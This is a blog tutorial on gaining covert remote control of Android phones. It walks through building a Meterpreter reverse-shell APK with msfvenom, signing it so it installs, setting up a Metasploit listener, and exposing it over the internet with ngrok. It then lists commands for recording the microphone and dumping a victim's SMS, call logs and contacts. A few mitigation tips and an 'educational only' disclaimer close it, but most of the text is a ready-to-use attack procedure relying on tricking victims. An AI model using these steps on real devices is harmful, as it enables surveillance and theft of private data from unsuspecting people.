How to exploit any android device using msfvenom and Metasploit Framework

Archana Tulsiyani
9 min readApr 22, 2021

--

Learn how you can exploit and get any sensitive information from any android device.

Photo by Denny Müller on Unsplash

In this tutorial, we’ll learn how to use MSFvenom and the Metasploit framework to exploit an Android mobile device. We’ll build the payload with MSFvenom, save it as a .apk file, and add a listener to the Metasploit system. An attacker can easily regain control of the Metasploit session until the user/victim downloads and install the malicious.apk. To do so, an attacker would need to use social engineering to get the.apk into the victim’s mobile device. We’ll see it with LAN and WAN. For this tutorial I am using android emulator.

Components:

Attack Machine: Kali Linux Linux (You can you any other Linux based system but I prefer Kali Linux)

Victim Machine: Android Emilator

Other tools used: Keytool(in-built), jarsigner(in-built) and Zipalign.

What is Keytool?

Keytool is a management tool of the key and certificate. This enables users to manage their own private and public key pairs and associated self-authentication certificates for authentication, using digital signatures (where the user authenticates himself to other users/services). It also enables users to cache their communicating partners’ public keys (in the form of certificates).

What is Jarsigner?

The jarsigner tool uses Keystore information to create or verify Java ARchive (JAR) digital signatures. (A JAR file packages in a single file class files, pictures, sounds, and/or other digital data). The jarsigner checks the digital signature of a JAR file, by using its supplier certificate (included in the JAR file’s signature block), and checks whether or not it contains a “trustworthy” public key of a JAR file, that is, in the designated Keystore.

Please Note: The java key tool in JDK 1.1 has been fully replaced by the key tool and jarsigner tool. These new tools provides more features not only that it generates the certificates but can also verify them.

What is MSFvenom?

MSFvenom is the product of merging “MSFpayload” and “MSFencode.” These techniques are particularly useful for creating payloads in a variety of formats and encoding them with different encoder modules. By combining these two tools into one, you can optimize the command-line options while also speeding up the process by using a single framework. MSFvenom will be used to build our malicious. apk payload.

Method 1: Exploiting on LAN

Before starting this tutorial you must keep in mind that the target should be on the same network as the attacker.

Step 1: Creating a malicious apk

Open the terminal in Kali Linux and type the following command. msfvenom -p android/meterpreter/reverse_tcp LHOST= localhost Ip LPORT= 4444 R > filename.apk

Arguments explained

-p — Payload to be used

LHOST — Localhost IP to receive a back connection (Check yours with ifconfig command)

LPORT — Localhost port on which the connection listen for the victim (we set it to 4444)

R — Raw format (we select .apk)

You can use any port number you want; I used 4444. The filename for this payload is “android_shell.apk”. This file will be mounted on the Android device of our target. However, we must first set our listener before downloading this file.

Step 2: Verify the apk is created

You can use the command ls -la to verify the apk file is created

Step 3: Sign the Certificate

After we’ve successfully created the.apk file, we’ll need to sign a certificate because Android devices won’t let us install apps unless the certificate is properly signed. Only signed.apk files are installed on Android devices.

In Kali Linux, we must manually sign the.apk file with:

Keytool (preinstalled)

jar signer (preinstalled)

zipalign (need to install)

Let’s use Keytool first. Use the following commands to get the Keystore of the.apk file: keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

Let’s use Jarsigner to sign the apk file. Use the following command: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked

Verify if the application is signed by using the following command: jarsigner -verify -verbose -certs android_shell.apk

Zipalign is not preinstalled in KaliLinux, so you have to install it use the command: apt-get install zipalign

Zipalign is it not preinstalled in KaliLinux

Let’s verify the signed .apk to the new file using zipalign using the command: zipalign -v 4 android_shell.apk singed_jar.apk

We’ve successfully signed our android shell.apk file, and it can now be used in any Android environment. Following the Zipalign verification, our updated filename is singed jar.apk.

Step 4: Setup Listener on Metasploit

Load the Metasploit console, using msfconsole. After it’s loaded (it may take few minutes), draft the multi-handler exploit using the command

use exploit/multi/handler

Now, setup the reverse payload

set payload android/meterpreter/reverse_tcp

Setup the LHOST, your-local-IP, and LPORT which you will use to generate the payload. Here 4444 port number is used. If you don’t know your IP address you can always check with the ifconfig command.

set LHOST <your-ip-address>

set LPORT 4444

type run or exploit command to start the listener.

Step 5: Configure Android Emulator

For this tutorial, I am using an Android emulator. Let’s quickly install the android emulator.

You can download the Android x86 code from Google code. Follow the steps below to install the Android Emulator

· In the VMware workstation, build a virtual machine

· In the VMware options, mount the ISO file.

· Complete the procedure and start the computer in LIVE mode.

· Configure the Android computer.

· Create a Google account.

Note: With an Ethernet adapter, the Android x86 project will link to a local network (VMnet8). You can use a CLI Android emulator if you are using another emulator to penetrate the Android device.

Step 6: Install Malicious apk in the target device

Once the target installs the app, run the application as soon as it’s installed. When the victim will open the application you will get access to the android phone. However, the target will not suspect anything.

As you can see in the screenshot we have successfully acquired the Meterpreter session on the android device. Let’s start with some common commands

Sysinfo

This will show you information regarding the system you have access to.

Root Check

This command will let you know if the device is rooted or not.

Record Mic

This command will record the socunds on victim end.

Get Wan Geo Location, Dumped SMS, Dumped Call Logs, and Change the audio mode.

This command will give you the geolocation of wan, will dump the call logs if any, and same goes for messages. It will also change the audio mode of the android device. Here I am using android emulator so there are no text messages as well as call logs.

Dump Contacts

This command will save the list of a contact saved in the device in the text file.

You can see the dumped contacts using cat command as cat <name of the file>.

Webcam snap

This command will take a screenshot of the screen of the device.

Get Uid

This command will give you the uid of the device

Application List

This command will show you the list of application that is installed on the android device

Apart, from these commands, there are various commands that you can perform. You can find the list of commands using ?

Method 2: Exploitation over WAN

In a WAN, you usually need a Static IP/Hostname and then Port Forwarding to enable traffic transmission, and we all know that these are difficult to do in real-time because we have restricted access to ports in a network.

As a result, in this case, we’ll use Ngrok to build a safe tunnel.

Ngrok is a tunneling reverse proxy technology that creates tunnels from a public endpoint, such as the internet, to a network service that is running locally. This can be used to generate a public HTTP/HTTPS URL for a website that is hosted locally on our machine. When using Ngrok, we don’t need to use any port forwarding, and our network service will eventually be exposed to the internet through TCP tunneling.

Follow the steps below

Step1: Create a Ngrok Account

Sign-up for the Ngrok Account and It will lead you to the download page.

As soon as you sign up it will take you to the download page of ngrok

You can choose the OS you are working on from here and download the ngrok.

Step 2: Connect your account

When you run this command, your auth token will be added to the default ngrok.yml configuration file. This will give you access to more features and allow you to stay online for longer periods. (After signing in, copy and paste your token here from the ngrok home screen)

(After signing in, copy and paste your token here from the ngrok home screen)

./ngrok auth token <your-token>

You’re now able to put this tool to work.

./ngrok tcp [port no]

Use the port no with you want to bind the connection.

The TCP tunnel provided by ngrok is defined by the forwarding here. The link is now connected to port no of your choice on localhost.

After these two steps follow rest of the steps same as Method 1 from step 4.

How to Mitigate attacks like these

  • Don’t allow applications to be downloaded from cloud sites.
  • Don’t install apps with unknown source options enabled.
  • Use antivirus.
  • Don’t click on any unrelated or unknown links.
  • Never download any unwanted .doc, .pdf or .apk file.
  • Always double-check the source before downloading.

Conclusion

This is how an Android device can be exploited and accessed regardless of the type of connection between both the attacker and the victim. It can be seen that it is very easy to hack into an android device when the user is unaware.

Such apps may be shared in click-to-click social media groups to attract users without informing them of the attack.

Please note that you’re not advised to use this tutorial for an illegal purpose. This is for educational purposes only. I am not responsible for any illegal activity performed

--

--